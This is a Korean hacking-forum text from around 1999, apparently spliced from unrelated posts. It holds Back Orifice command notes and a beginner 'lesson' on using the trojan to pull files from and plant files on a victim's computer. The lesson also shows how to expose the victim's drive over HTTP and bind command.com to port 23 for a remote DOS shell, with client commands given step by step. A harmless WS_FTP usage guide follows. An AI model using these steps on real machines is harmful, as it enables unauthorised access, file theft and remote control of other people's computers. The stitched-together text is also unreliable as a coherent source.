주의사항) 파일명에는 항상 절대경로를 적어주셔야 합니다.
ex) c 드라이브의 똥개 폴더에 잇는 똥개 txt 파일을 선택할 경우
c:\똥개\똥개.txt
File delete
- 파일을 지우는 기능입니다. 디렉토리를 지우는게 아니라 파일을
지우는 기능입니다. 이것 역시 절대경로를 적어주셔야 합니다.
File find
- 파일을 찾는 기능을 수행합니다. 윈도우의 탐색 기능이라고 생각
하시면 됩니다. 'File mask' 에는 찾을 파일을 입력하시고 'Sear
ch path root' 에는 검색할 하드 명을 입력하세요.
ex) File mask : 어쩌고.txt
Search path root : c:\
File view
- 이 기능은 txt 파일을 볼때 쓰입니다. 'File name' 에 절대경로
를 지정해 주셔야 합니다.
ex) c:\헐\헐.txt
File freeze, melt
- 이 기능은 파일을 압축하거나 압축을 풀때 사용합니다.
『HACKER-기타 (go SGHACK0706)』
[487] 제목 : [강좌] 백오리피스 활용법 [기초#4]
올린이 : 버스트 (이승진 ) 99/03/13 12:48 읽음 : 28 관련자료 없음
제 4 편..
백오리피스의 활용.. (기타 부분적 활용)
자 이번시간에는 상대방의 하드에 있는 파일들을 빼오거나, 아니
면 파일을 상대방 하드에 심어두는 걸 배워보도록 하겠습니다. B
oftp 라고 Bo 플러그인인데 이걸 이용하면 편하다고 하더군요.하
지만 Boftp 에 대한 설명은 하지 않도록 하겠습니다. 초보 강좌
이니까요. ^^ (Boftp 와 플러그인들의 설명을 보고 싶으신 분들
은 인터넷 해킹 사이트를 돌아다녀보세요. 널려있습니다.)
상대방 컴퓨터를 인터넷 실행프로그램으로 읽기
- 상대방 컴퓨터의 포트를 설정해놓고 익스플로러 등으로 들어갑
니다..
Boclient.exe 실행 - host IP번호 - httpoff - httpon 80
이제 익스플로러나 넷스케이프를 띄웁니다.
http://IP번호:80 이라고 치시면 상대방 컴퓨터가 읽어집니다...
웹브라우저가 익스플로러 일때 상대방 컴퓨터의 파일을 마우스로
선택하면 자신의 하드가 읽어질 겁니다. 그럴때는 절대경로를 입
력하셔서 가면 됩니다.
ex) http://IP번호:80\c:\v3.exe
라고 치시면 v3.exe 라는 파일을 다운로드 할수 있습니다. (텍스
트 파일을 선택하셨을때는 웹브라우저상에 나타납니다.) 웹 브라
우저 맨 밑을 보면 업로드 파일이라고 있습니다. 거기에 자신 의
하드에 있는 파일을 선택하시고 업로드를 누르시면 됩니다. 이때
절대경로를 입력해 주셔야 합니다.
상대방 컴퓨터를 통신 프로그램으로 읽기
- 위와 동일한 내용이지만 이건 도스 프롬포트로 뜹니다.
Boclient.exe 실행 - host IP번호 - command.com 23
이제 새롬이나 이야기 같은 통신프로그램을 실행시킨후에 텔넷연
결 합니다.
ex) IP번호:23
그럼 도스 프롬포트가 뜨면서 조종이 가능합니다.
WS_FTP 사 용 법
1.설치
-기본적으로 인터넷 도구들은 하나의 디렉토리를 만들어 놓고 그 안에 인스톨하여
사용하는 것이 좋습니다.
저의 경우에는 INTERNET이라는 디렉토리를 루트 디렉토리의 서브 디렉토리로
만들어 놓고 사용하고 있습니다.
-인스톨 시 프로그램에서 Location 위치를 물어 오면 c:\internet\...으로 지정을
하십시오.
설치완료 후 환경 설정은 별개 없으니 바로 접속 방법을 알아 보겠습니다
2. 접속 방법은 전화 접속 네트워킹을 중심으로 합니다.
자신이 만들어 놓은 전화접속 네트워킹으로 서비스에 접속 후(유니텔은 윈속프로
그램으로) 기본 프로그램에 로케이션 된 WS_FTP.exe를 클릭하여
E-Mail입력 창이 나오면 각기 자신의 E-Mail Address를 적어 주고 OK를 누릅니다.
Session Profile 화면이 나오면
a)profile Name 란의 아래 삼각형을 눌러 보십시오.
-기본적으로 기억 돼 있는 여러개의 프로필이 보일 것입니다.
그 중 어느 것이나 선택하고 싶은 것을 골라서 클릭한 후 옆의 OK를 누르면
잠시 후 접속이 될 것입니다. 상큼한 소라와 더불어.
(그 전에 패스워드가 나올 경우 귀하의 비밀번호를 적습니다.)
-Local System은 사용자의 컴퓨터를 의미하며
Remote System은 접속 하고자 하는 시스템입니다.
파일을 다운 받고자하면 귀하의 컴퓨터에 임의의 디렉토리를 하나 만드십시오.
그 방법은 Local System에 루트 디렉토리에서 맨 위의 ..을 떠블ㅋ클릭하여 상단의
대화창에 c:\이 생성된 후
역시 Local System에 있는 MkDir(여기의 대화창에서 C:\bang이라고 적어도 됩니
다) 를 눌러서 나온 대화창에 bang 이라는 임의의 다운로드용 디렉토리를 적은 후
ok를 누릅니다.
그 bang이라는 임으의 디렉토리를 목적 디렉토리로 하고
(자신의 컴 맨 위의 대화창에 c:\bang 이라고 나올 것임)Remote System의 다운
받곧자 하는 파일을 더블클릭 하거나 가운데에 있는 화살표 중 자신의 시스템을
향한 것을 눌러 주면 됩니다.
주의.*.htm(l)이나 *.txt 파일 등은 ASCII, 실행 파일은 Binary로 선택을 합니다.
하나의 파일을 선택하여 하나씩 다운 받을 수 있으며 전체를 클릭하여 여러개의
파일을 연속적으로 다운 받을 수도 있습니다.
****파일의 전송은 위와 역으로 하면 됩니다.
*ChgDir은 가고자하는 디렉토리를 적어 주는 것으로 목적 디렉토리로 가고자할 때
사용합니다.
해당 파일을 더블클릭 하여도 같은 효과를 얻을 수 있습니다.
*Remote System에서는 ChgDir을 클릭하면 나온 창에서 삼각형을 눌러 나열된파일
들 중에서 원하는 파일을 클릭하는 방법도 있습니다.
# 접속한 곳에서 다른 곳으로 접속을 바꾸고자 한다면 제일 아래의 메뉴 바들 중
제일 왼쪽의 Close를 누릅니다. 잠시 후 그 자리에 Connect라고 뜰 것입니다. 그
자리의 Connect를 누릅니다.
그럼 처음의 접속 창이 다시 나옵니다. 거기에서 처음의 방법으로 접속하고자 하
는 곳을 찾아 접속 하시면 됩니다.
b)자신이 원하는 곳을 직접 접속하고 싶다면 어떻게?
-Session Profile에서 New를 클릭 합니다.
-자신이 접속하고자 하는 곳의 Host Name을 도메인명을 적거나 Ip Address를 적어
줍니다.
- Host Type에는 옆의 아래 방향 삼각형을 눌러 auto detect를 선택합니다.
-User ID에는 anonymouse를 적거나 계정이 있는 곳을 접속할 때는 그 곳에서 자신
이 사용하는 ID를 적어 줍니다.계정 이외의 곳을 주로 접속할 때에는 옆의
Anonymouse를 체크해 놓고 사용합니다.
-Password항에는 자신의 email address를 적거나 공란으로 접속을 하면 됩니다.
대부분 넣지 않는 경우가 많습니다.
*호스트네임 위의 Save를 눌면 프로파일에 저장이 됩니다. 즉 다음 부터는 Profile
Name의 아래 삼각형을 클릭하면 자신이 저장해 놓은 항목을 찾아 위에 설명한 방법
으로 접속 할 수 있다는 것이죠.
여기에서 자신의 계정이 있는 곳에 접속했을 때 위에서 패스워드를 써 넣지 않았으
니까 패스워드를 묻는 창이 뜰 수도 있습니다.
자신이 그 계정에 갖고 있는 비밀번호를 써 넣고 OK를 누르면 되겠죠?
***항상 접속을 마칠 때에는 맨 아래의 close를 누른 후 exit로 빠져
나온 뒤 전화 접속네트워킹이나 기타의 접속 도구를 역시 종료해야 합니다.